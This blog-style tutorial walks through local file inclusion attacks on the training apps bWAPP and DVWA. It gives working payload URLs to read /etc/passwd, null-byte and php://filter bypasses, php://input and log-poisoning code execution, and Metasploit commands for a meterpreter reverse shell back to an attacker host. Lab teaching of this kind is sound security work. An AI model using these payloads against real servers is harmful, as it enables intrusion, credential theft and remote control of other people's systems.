The
main aim of writing this article is to share the idea of making an attack on a
web server using various techniques when the server is suffering from file
inclusion vulnerability. As we all are aware of LFI vulnerability which allows
the user to include a file through URL in the browser. In this article I have
used two different platform bWAPP
and DVWA which contains file
inclusion vulnerability and through which I have performed LFI attack in FOUR
different ways.
Basic local file
inclusion
Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then
click on hack.
Here
the requested web page which suffering from RFI & LFI Vulnerability gets
open. Where you will find a comment to select a language from the given drop
down list, and when you click on go button the selected language file get
included in URL. To perform basic attacks manipulate
http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd
In
basic LFI attack we can directly read the content of a file from its directories
using (../) or simply (/), now if you will notice the given
below screenshot you will find that I have access the password file when the above
URL is executed in the browser.
Null byte
In some scenario the above basic local file inclusion
attack may not work due to high security level. From below image you can
observe now that I got fail to read the password file when executing the same path
in URL. So when we face such kind of problem then go for NULL BYTE attack.
Now
turn on burp suite to capture the
browser request then select proxy tab
and start intercept. Do not forget
to set browser proxy while making use of burp suite
Now inside burp suite send the intercepted data into
repeater.
Inside
repeater you can do analysis of sent request and response generated by it. From
screenshot it will be clear that /etc/passwd
is not working and I am not able to read the password file.
From following screenshot you can see I had forward the
request by adding null character ()
at the end of directory /etc/passwd and
click on go tab. Then on the right
sight of window the password file get open as response.
Base64 encoded
Now there is another way to exploit LFI when the security
level is high and you are unable to view the PHP file content, and then use the
following PHP function.
http://192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd
Here from the screenshot you can see the content of password
file is encoded into base64; copy the whole encoded text.
I am using hackbar which a Firefox plugin to decode above
copied text.
Now a pop-up box will get open past the copied encoded text inside it and click on ok
From the given screenshot you can view the result and read
the content of password file.
PHP Input
Using
PHP input function we will execute injected PHP code to exploit LFI
vulnerability. With the help of hackbar
I am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given
screenshot.
Now manipulate above URL using PHP input function
Then
select the check box to enable Post data which will forward the
post request and add cmd comment in
given text areaas shown in following
screenshot, finally click on execute.
This will show directories of victim PC.
Now time to connect the victim through reverse connection;
open terminal in kali Linux and type msfconsole
to start metasploit framework.
Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload
windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
Paste above
copied PHP code inside the URL as shown in the image and execute it
When above URL get execute the attacker got victim’s
meterpreter session inside the metasploit.
msf exploit (web_delivery)>session –I 1
meterpreter> sysinfo
Proc/self/environ
If the server is outdated then to exploit it through LFI
we can include proc/self/environ file that stores User_Agent where we will
place our PHP code for executing CMD command.
Now start burp suite and
capture the browser request and send the fetch data into repeater.
Add
cmd comment inside
user_Agent and send the request with GET parameter 192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the
right side of window you can see the highlight result as response.
0 comments:
Post a Comment